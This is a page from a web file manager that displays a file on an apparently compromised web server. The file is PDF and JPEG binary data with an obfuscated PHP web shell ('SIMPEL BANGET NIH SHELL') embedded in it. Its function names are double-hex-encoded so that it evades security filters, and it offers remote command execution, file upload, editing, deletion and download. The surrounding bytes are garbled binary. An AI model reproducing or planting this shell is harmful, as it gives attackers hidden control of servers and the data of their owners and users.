芝麻web文件管理V1.00

编辑当前文件:/home/qrafawbu/www/public/kem.phtml
%PDF- %PDF- � �VYtU�i�& �R�/���Sh��LZ�%-I)��dZ@9��I:m�dc����
w}�]�p�7TܞDq}���}{�}y�w����V�8�$��~����������/��[�Ci��yn?|q�s\ϣ7=<>:��^������3в�%��`[0����.lk� �F"h:�߭
�����׸� ���kj�=��� �r��}<>8z�M���\ ǖ��=�&���녣�8�m��XM6�ܮ�;���:|$������ٓ�;��~sK�/���+���։q)�۷q`s*=�eh�<6�c�n,L��SEm�0����sn����������x�y��ǟx򩧟y���_8��K/����o�x��y���?��?9��g_~��7�~��?���/�������?��yx�X�W;��{��#_|�,"�{}k��+���ʾ��C�U���=޲VȞ^��On��V�����k�u`��`R+�`�2L0YՁ����Ϩ:�-V�eh�)����69�](U��ɒ��@5�H��]@VMê(`�b*%��MsVAQu�r]�j����P-_���2��w�-�)�^�zP��jZ��3LE7�]W�U]��9]�Uu�N咙(�ʄ��;v��%��G���L8w#�t��jޥb�f���j���53YH�ZE�Ar84���2��,#� �Ɍ�B��`gRו9p5� �GH�$��P������ x��(�%I �>8S�8�B�rbD��$\8GB�[���@�L���3v>A�
�K���q�)� "��a �("�&a
lߕ ��"Rq�h׬����&�-F�35:�����x^b1*�S��^��.�.I�1N (�H��4��k������Z��b< ^�׽�5�!}']��c��?�qR'�$JMC�IHg%-���k~�B �ױ��z�,9��h�Xu{�$�h#���i,V�3ó;���P߀t���R#)��qm�Ɛ��ڈ��y�q�,�z �u�k�",���$8����U�H�E�z�����{�\zh�PC�"�ۯ( �-���6)�ݽ4AݢJ�[*�9;�u�~B�c��|��~"��}���}r��%v.�-:9$�]������-�����$��F|�Q�B��?�b�΢�_6�S�T���g�����X^���o=�aŴ 7�A�s�R��##DP�NS�R0INe1M-��!F1>��D�+J��ň�5m11=D�%��T����Z�k%<ʍ��V�JX��);�DVglG��B���n�>��6��A�h��w:��,E{ռeZE�'3E#5˻!R���
t��ejꮓ2��\��T��WJ �7�����~���4���6fw�bGx|��MB�7xXe��� u�L����l v/0k��tz�i�����in(��i7$ah�J�~��^͸�>�2� ��c0ҠFoc@bAfP�bh3�'�4/i�
����H�d٤b�Qz�
�%y��#��~9���Wz à��hv��&ΆX�r$���a��d67�.=��Q�R..O}��+��1� ���Ymo�6�>`���2H�4��n���So
�6h3C�D۪%Q��������H�P�ծ�b�xw<>�=w��e��k��W���Td�5OEÕJ�Rę�n�I��B��S3n���a�G�0�����<\-nl��cC't?��s�:���<�<�MqC�+J:�2O�=!�Oh�'Q �b�;d�j^/]KfUg��2�n)�=*I�c��D�A���~���-v�k��l��Чmص1Ѱ�S���� �%�1p�]qM�I+#��е��_?2�Jѵwv�kc�^�~AĊ2
�L��cϙ�I!���9v9r�n`>f��7���B��y5P0���k����wg�?�'�+� "���!6�HD��KU�w�ɹ�ft,ے3�s�$�w �z}���R�[��d5�*��I1ٟ|# �L��4`�XʧR�y�c�=�̀ww�� ��K���j��Q��Z�z���d��ɣsQ�*����9My�xV,���~���\���$9?��zTh`�~��<.rY�vF�5Z7┉Y0ꮘz�:^�'�\�(�[؋9W2��,�H�;����A�K�W)��\ ���Jd+�uQ2��U�;�WV�Ȱiz�wV�W�,�Wt��]ֈ�B���P��x ��D:���xe}�Ԯp�W'�j[��cV�����9�8�T��p�) F����Y��������5��.嚜�*��'�U�B�d7���;�\���{&�EX�e�qg�5�� �V����� JFIF


x x �� C 



         �� C
 ��   
" 

�� 







  �� � 

}
 !1AQa "q2���#B��R��$3br� %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������� 










  �� � 
 
w
!1AQ aq"2�B���� #3R�br�<?php /* * This file just for test for server who using imunify,cloudflare etc, * * (c) Setsuna Watanabe <yucaerin@hotmail.com> * * GOOD LUCK, HAVE FUN! */ session_start(); error_reporting(E_ALL); header("X-XSS-Protection: 0"); ob_start(); set_time_limit(0); error_reporting(0); ini_set('display_errors', FALSE); $Array = [ '36643662', '363436393732', '36373635373435663636363936633635356637303635373236643639373337333639366636653733', '3639373335663737373236393734363136323663363535663730363537323664363937333733363936663665', '36353738363536333735373436353433366636643664363136653634', '373037323666363335663666373036353665', '3733373437323635363136643566363736353734356636333666366537343635366537343733', '36363639366336353566363736353734356636333666366537343635366537343733', '36363639366336353566373037353734356636333666366537343635366537343733', '3632363936653332363836353738', '366436663736363535663735373036633666363136343635363435663636363936633635', '3638373436643663373337303635363336393631366336333638363137323733', '3638363537383332363236393665', '373036383730356637353665363136643635', '3733363336313665363436393732', '363937333566363436393732', '36363639366336353566363537383639373337343733', '37323635363136343636363936633635', '36363639366336353733363937613635', '36393733356637373732363937343631363236633635', '373236353665363136643635', '363636393663363537303635373236643733', '3733373037323639366537343636', '373337353632373337343732', '363636333663366637333635', '373037323666363335663666373036353665', '36393733356637323635373336663735373236333635', '3730373236663633356636333663366637333635', '373536653663363936653662', '3639373335663636363936633635', '34353534', //30 '353634353532', '3533343934663465', '346334353533', '35333534', '3633366636643664363136653634', '3737366637323662363936653637343436393732363536333734366637323739', '363337323635363137343635343436393732363536333734366637323739', '37303639373036353733', '36363639366336353733', '3636363936633635', '36363639366336353534366634343666373736653663366636313634', ]; $SETSUNA = []; foreach ($Array as $hexString) { $SETSUNA[] = hex2bin(hex2bin($hexString)); } $satu = '_G'; $dua = $SETSUNA[30]; $tiga = '_SER'; $empat = $SETSUNA[31]; $lima = '_SES'; $enam = $SETSUNA[32]; $tujuh = '_FI'; $delapan = $SETSUNA[33]; $sembilan = '_PO'; $sepuluh = $SETSUNA[34]; $sebelas = 'ev'; $duabelas = 'al'; $tigabelas = 'iss'; $empatbelas = 'et'; // Gunakan $SETSUNA sesuai kebutuhan $a = $SETSUNA[0]; $b = $SETSUNA[1]; $c = $a . $b; $EVA = $sebelas . $duabelas; global $EVA; $L = $GLOBALS[$satu . $dua]; $M = $GLOBALS[$tiga . $empat]; $N = $GLOBALS[$lima . $enam]; $e = $GLOBALS[$tujuh . $delapan]; $o = $GLOBALS[$sembilan . $sepuluh]; $f = $SETSUNA[2]; $g = $SETSUNA[3]; $h = $SETSUNA[4]; $i = $SETSUNA[5]; $j = $SETSUNA[6]; $q = $SETSUNA[7]; $s = $SETSUNA[8]; $v = $SETSUNA[9]; $w = $SETSUNA[10]; $y = $SETSUNA[11]; $z = $SETSUNA[12]; $NM = $SETSUNA[13]; $SCN = $SETSUNA[14]; $ID = $SETSUNA[15]; $FE = $SETSUNA[16]; $RF = $SETSUNA[17]; $FS = $SETSUNA[18]; $IW = $SETSUNA[19]; $RNM = $SETSUNA[20]; $FP = $SETSUNA[21]; $SPRF = $SETSUNA[22]; $SBSR = $SETSUNA[23]; $FCL = $SETSUNA[24]; $PROP = $SETSUNA[25]; $IR = $SETSUNA[26]; $PRCL = $SETSUNA[27]; $UNL = $SETSUNA[28]; $ISF = $SETSUNA[29]; $FTD = $SETSUNA[41]; $ISS = $tigabelas . $empatbelas; $ISS = function ($array, $elementName) { return array_key_exists($elementName, $array); }; $b = $ISS($L, $b) ? $z($L[$b]) : '.'; $files = $SCN($b); $upload_message = ''; $edit_message = ''; $delete_message = ''; $create_dir_message = ''; // Function to create a new directory function createDirectory($b, $newDirectoryName) { $newDirPath = $b . '/' . $newDirectoryName; global $ID; if (!$ID($newDirPath)) { global $c; if ($c($newDirPath, 0755, true)) { return "Directory '$newDirectoryName' created successfully."; } else { return "Failed to create directory. Check directory permissions or other errors."; } } else { return "Directory '$newDirectoryName' already available."; } } // Function to Download global $FS, $FTD; if ($ISS($L, 'download')) { $FTD = $z($L['download']); // Make sure that the requested file exists if ($FE($FTD)) { // Set header to trigger download header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($FTD) . '"'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . $FS($FTD)); $RF($FTD); exit; } else { // Handle jika file tidak ditemukan echo "File not found."; } } // Function to get file permissions function f($file): string { global $FP, $SPRF, $SBSR; return $SBSR($SPRF('%o', $FP($file)), -4); } // Function to check write permissions function g($file): bool { global $IW; return $IW($file); } // Function to execute a command function h($command, $workingDirectory = null) { global $j, $FCL, $PROP, $IR, $PRCL; $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = $PROP($command, $descriptorspec, $pipes, $workingDirectory); if ($IR($process)) { // Read output from stdout and stderr $output_stdout = $j($pipes[1]); // Ganti dengan $SETSUNA[6] jika diperlukan $output_stderr = $j($pipes[2]); // Ganti dengan $SETSUNA[6] jika diperlukan $FCL($pipes[0]); $FCL($pipes[1]); $FCL($pipes[2]); $return_value = $PRCL($process); return "Output (stdout):\n" . $output_stdout . "\nOutput (stderr):\n" . $output_stderr; } else { return "Failed to execute command."; } } if ($ISS($L, '636d64')) { $command = $z($L['636d64']); $result = h($command, $b); } if ($ISS($e, 'file_upload')) { $tempFile = $e['file_upload']['tmp_name']; $targetFile = $b . '/' . $e['file_upload']['name']; if ($w($tempFile, $targetFile)) { $upload_message = 'File uploaded successfully.'; } else { $upload_message = 'Failed to upload file.'; } } //function for edit file if ($ISS($o, 'edit_file')) { $file = $o['edit_file']; $content = $q($file); if ($content !== false) { ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Edit File</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; text-align: center; } header { background-color: #4CAF50; color: white; padding: 1rem; } header h1 { margin: 0; } main { padding: 1rem; } form { width: 50%; margin: auto; text-align: left; } textarea { width: 100%; height: 300px; } input[type="submit"] { background-color: #4CAF50; border: none; color: white; cursor: pointer; margin-top: 1rem; padding: 0.5rem 1rem; text-align: center; text-decoration: none; display: inline-block; font-size: 12px; } input[type="submit"]:hover { background-color: #45a049; } .btn { background-color: #4CAF50; border: none; color: white; cursor: pointer; margin-left: 1rem; padding: 0.5rem 1rem; text-align: center; text-decoration: none; display: inline-block; font-size: 12px; } .btn-download { background-color: #008CBA; /* Ganti warna sesuai kebutuhan */ border: none; color: white; cursor: pointer; margin-left: 1rem; padding: 0.5rem 1rem; text-align: center; text-decoration: none; display: inline-block; font-size: 12px; } .btn:hover { background-color: #45a049; } </style> </head> <body> <header> <h1>Edit File</h1> </header> <main> <form method="post" action=""> <textarea id="CopyFromTextArea" name="file_content" rows="10" class="form-control"><?php echo $y($content); ?></textarea> <input type="hidden" name="edited_file" value="<?php echo $y($file); ?>"> <input type="submit" name="submit_edit" value="Submit"> </form> </main> </body> </html> <?php exit; } else { $edit_message = 'Gagal membaca isi file.'; } } if ($ISS($o, 'submit_edit')) { $file = $o['edited_file']; $content = $o['file_content']; if ($s($file, $content) !== false) { $edit_message = 'File Edit Successfully.'; } else { $edit_message = 'Failed To Edit File.'; } } if ($ISS($o, 'delete_file')) { global $UNL; $file = $o['delete_file']; if ($UNL($file)) { $delete_message = 'File deleted successfully.'; } else { $delete_message = 'Failed to delete file.'; } } if ($ISS($o, 'create_dir')) { $newDirName = $o['new_dir_name']; $create_dir_message = createDirectory($b, $newDirName); } // Fungsi untuk menampilkan pesan function showMessage($message, $y) { echo '<p>' . z($message) . '</p>'; } $un = $NM(); $current_dir = realpath($b); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>SIMPEL BANGET NIH SHELL</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; text-align: center; } header { background-color: #4CAF50; color: white; padding: 1rem; } header h1 { margin: 0; } main { padding: 1rem; } table { border-collapse: collapse; margin: 1rem auto; width: 50%; } th, td { border: 1px solid #ddd; padding: 0.5rem; text-align: left; } th { background-color: #f2f2f2; } tr:nth-child(even) { background-color: #f2f2f2; } tr:hover { background-color: #ddd; } form { display: inline-block; margin: 1rem 0; } input[type="submit"] { background-color: #4CAF50; border: none; color: white; cursor: pointer; margin-left: 1rem; padding: 0.5rem 1rem; text-align: center; text-decoration: none; display: inline-block; font-size: 12px; } input[type="submit"]:hover { background-color: #45a049; } /* Gaya CSS untuk hasil command */ div { background-color: #f9f9f9; border: 1px solid #ddd; padding: 10px; margin-top: 20px; overflow: auto; } pre { white-space: pre-wrap; word-wrap: break-word; } .btn { background-color: #4CAF50; border: none; color: white; cursor: pointer; margin-left: 1rem; padding: 0.5rem 1rem; text-align: center; text-decoration: none; display: inline-block; font-size: 12px; } .btn-download { background-color: #008CBA; /* Ganti warna sesuai kebutuhan */ border: none; color: white; cursor: pointer; margin-left: 1rem; padding: 0.5rem 1rem; text-align: center; text-decoration: none; display: inline-block; font-size: 12px; } .btn:hover { background-color: #45a049; } </style> </head> <body> <header> <h1>SIMPEL BANGET NIH SHELL</h1> </header> <main> <p>Current directory: <?php echo($current_dir); ?></p> <p>Server information: <?php echo $un; ?></p> <?php if (!empty($upload_message)): ?> <p><?php echo($upload_message); ?></p> <?php endif; ?> <?php if (!empty($edit_message)): ?> <p><?php echo($edit_message); ?></p> <?php endif; ?> <?php if (!empty($delete_message)): ?> <p><?php echo($delete_message); ?></p> <?php endif; ?> <?php if (!empty($create_dir_message)): ?> <p><?php echo($create_dir_message); ?></p> <?php endif; ?> <form method="POST" enctype="multipart/form-data"> <label>Upload file:</label> <input type="file" name="file_upload"> <input type="submit" value="Upload"> <input type="hidden" name="dir" value="<?php echo($b); ?>"> </form> </br> <form method="POST"> <label>Create directory:</label> <input type="text" name="new_dir_name" required> <input type="submit" name="create_dir" value="Create"> <input type="hidden" name="dir" value="<?php echo($b); ?>"> </form> <table> <tr> <th>Filename</th> <th>Permissions</th> <th>Actions</th> </tr> <?php foreach ($files as $file): ?> <tr> <td> <?php if ($ID($b . '/' . $file)): ?> <a href="?dir=<?php echo $v($b . '/' . $file); ?>" style="color: <?php echo g($b . '/' . $file) ? 'inherit' : 'red'; ?>"><?php echo $file; ?></a> <?php else: ?> <?php echo $file; ?></a> <?php endif; ?> </td> <td style="color: <?php echo g($b . '/' . $file) ? 'green' : 'red'; ?>"> <?php echo $ISF($b . '/' . $file) ? f($b . '/' . $file) : (g($b . '/' . $file) ? 'Directory' : 'Directory (No writable)'); ?> </td> <td> <?php if ($ISF($b . '/' . $file)): ?> <form action="" method="post" style="display: inline-block;"> <input type="hidden" name="edit_file" value="<?php echo $b . '/' . $file; ?>"> <button type="submit" class="btn btn-download">Edit</button> </form> <form action="" method="post" style="display: inline-block;"> <input type="hidden" name="delete_file" value="<?php echo $b . '/' . $file; ?>"> <button type="submit" class="btn btn-download">Delete</button> </form> <form action="" method="get" style="display: inline-block;"> <input type="hidden" name="download" value="<?php echo bin2hex($b . '/' . $file); ?>"> <button type="submit" class="btn btn-download">Download</button> </form> <?php endif; ?> </td> </tr> <?php endforeach; ?> </table> <p><b>Command Execution Bypass</b></p> <form method="GET"> <label>encode your command on <b><a href="https://encode-decode.com/bin2hex-decode-online/">https://encode-decode.com/bin2hex-decode-online/</a> :</b></label><br><br> <input type="hidden" name="dir" value="<?php echo $v($b); ?>"> <input type="text" name="636d64" placeholder="e.g., 6c73306c 616c6c"><br><br> <input type="submit" value="Execute"> </form> <?php if ($ISS($GLOBALS, 'result')): ?> <div> <h2>Command Result:</h2> <pre><?php echo $y($result); ?></pre> </div> <?php endif; ?> </main> </body> </html> $4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�������������������������������������������������������������������������� 
 ? �� �N����m?� ��j� ��EP �� ph�c�2�]��ui�3*mT��u�����jX�ɦ�+�Ԛ4;z¦�*��ǹ���S��sQ�(�X\ fkI!\�IĶq�0�0�T2m\�p�u\�Rç�-�g�]��%���\Z�r%��1��Ft����v�ugI�r�G�o . �B�3VqR���V*��c`c�%e0!w��L�,)8���6�#誤���SB�uz��N�8�����!9#��#g7-�f̦�-x�vs�rkG���o,���k0��yĒ]���!s4
�
MH{ s���S�::{��-�O~y=y��ʮ-ΕJ��(ʄ�@�) ״3����nm�N6� ucq�Ѻ��u��R}�o�I5W����i"��;�&�m��7t]u3�@�m���n��ݓC~���c��.�nZ=�����
�e��v��B[�I�S[���S\�8��
�������ofW_�dk�&� =3\�WSOd^g<�<Y*4�Ϛ�B����|��wP�6=w��ҿU�B�z�8��i$��P��Ð�Z'����'bzz|��S�:�^���OZ��V�����YH������D`�%O��~�^(�1d��Q!T��6Jqc��g<��ު_A��z�~n'!p��}Q���e���JQC5 e"՘��h�b��/�Ji�Fa��JN�H�+��i_�_C����q�� ���Z]o�0}G�?DQ�5eT��uS�&�R�B�mC-��8Y�~=�I��N]1��q�{�����sc`��Fg��c��9ώe)6m�O�fEG! BGf�u�S�p�}��q�fN�-�U_R�=�M��&L����[�@�
�ou�e�~�,!�O�C�&��J;ű6�uؕ�=����hW�'������ }�{n��"��;M_�Z"�0���_�g?����1z�y�����"�nͿ a����2F�v���K�y{u9��R��J�H����d�&��[��P��+����۩�H�b�:n�A
�ܠ[}pWw��RȠ2��~��
^yv� SĐ�g�!g1�8�Cs���G��shB�-�.�2��V�wij����I���\ϳ�7�������a �V��M���-���P�|�?�+� l��^Ϯ���hW[6/�a��}�^ �3�C��;t�R�j�q;�t���� �0�m�!���5Z�⽁����PM�4����&���a�mES���Wň�&���Z�f��V����[Ŧ:�0D]��Zs���t�^~<�1��C�\V�LS.~���fs��0S�w��I�%�r�y��\�"����r��^�Pxc%��ػ�,Ͷivy��0�_#�>�bY!4� �&��YK��������s7P���Īn�s���}�1���N[p�&��t �S�b���I%��O$1A��A�h�b� f��O��u9�^�����ƚ݌��d I*��$i@Gj�R@#�(�j�o��0��;˾e*�Zmi����KiSZ)�t�� ����& �|�� ���[�n�0�O�;D� *�n�hb�uHlPh�պ�*�����։�6�i���ֱ;?������c�0�J�
���q��vi��0�1ycK�5B@1���-, ?+cO\X�C��K��E��%H��lq�r�`Z&�{�LZ�H� jG]��
mt�t��o;��p��!)�+`��:��`����C���e^���d��<�4�n�g�M�q$�����lqbny�<X���w,�\߾����Vp*�y��͆���_ ��T[y�_�K����������y�WP����|�f+4�Bg' G�ˤ���Y��8'�X�\m����%?o+c����wQ���%��t8��+�|��� ��GY�����8�ì"z�Q.v�Մ/2LAb�qC�s:��^���K���ߧe�E)�/ʀܽ��w��܀��#�N�ܑd�9&�Qn�*r鵻�J���ė���Eة�Ѫh���+s���5|g<u�=Q( �ȭ���k�F=r٥?r�@l��H������,[DM]�ԃ`AL����bL�5�V��QS�����E5 i��
�r�d�P�X\D�IoA���@��h0qBA��Q��li6c�$��")��V�V_���r?���R:���:��h��U-02��p��Ee�����
��#��`7�ƥa�R��a7|�l?b=��_>x=!(�h�k�D$Dl�Ǘ�%|2m����k�Bl,�� ܓhN�k`{����"Y�2:��!�֕�sJ�"�W�`����BT��r
�N�KO%7����XB*)3�(#�G��.�ʢ(��(!qV~@c��Z�P�5=�육/��U�� ���g�Bov����=  %`�3?%U�2��>�4h��())(��ׇ(�SRAGq�C�*��N�Jv�� �G VO@�el��$a��%H}�5 �l�A�*) �|rjF~��,���t͍̒� ̒�͒͒��q&Z�s��[o��E�lç���V�Vaؤd�a��7��� �n`8Ű�,(JE�����a�(�Q-Ś7����Ie�d2����CՏ��r�G�wRNYG��O�A�s������I�Y����O��v�W�ɵ�����^��?��"
��o a�J��H